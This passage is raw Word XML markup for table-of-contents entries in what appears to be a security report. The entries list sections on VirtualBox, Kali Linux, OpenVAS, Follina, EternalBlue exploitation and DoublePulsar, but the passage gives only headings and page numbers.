              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31BE4F78" w14:textId="0883BC0C" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190701" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Oracle VM VirtualBox</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190701 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CFB7C38" w14:textId="663ECA6E" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190702" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190702 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06D95114" w14:textId="00E8463D" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190703" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OpenVAS (Greenbone Vulnerability Management)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190703 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A0832EC" w14:textId="49FA88AB" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190704" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Follina - CVE2022-30190</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190704 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07966C97" w14:textId="5DDC650E" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190705" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EternalBlue MS17-010 – CVE-2017-0143</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190705 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30D0A311" w14:textId="0A17D1A8" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190706" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(A) Wrong Casting Bug</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190706 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F0C7E38" w14:textId="10026812" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190707" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(B) Wrong Parsing Bug</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190707 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D530948" w14:textId="66EF0212" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190708" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(C) Non-paged Pool Allocation Bug</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190708 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6597C7F3" w14:textId="57A9A90F" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190709" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation Technique (Primitive 1: MDL (pMdl1))</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190709 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ADEA958" w14:textId="198FB4FA" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190710" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation Technique (Primitive 2: pSrvNetWskStruct)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190710 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B13564F" w14:textId="53AD0248" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190711" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation Flow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190711 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FE2D729" w14:textId="4E8CD2FB" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190712" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DoublePulsar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190712 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C651E27" w14:textId="24799476" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190713" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
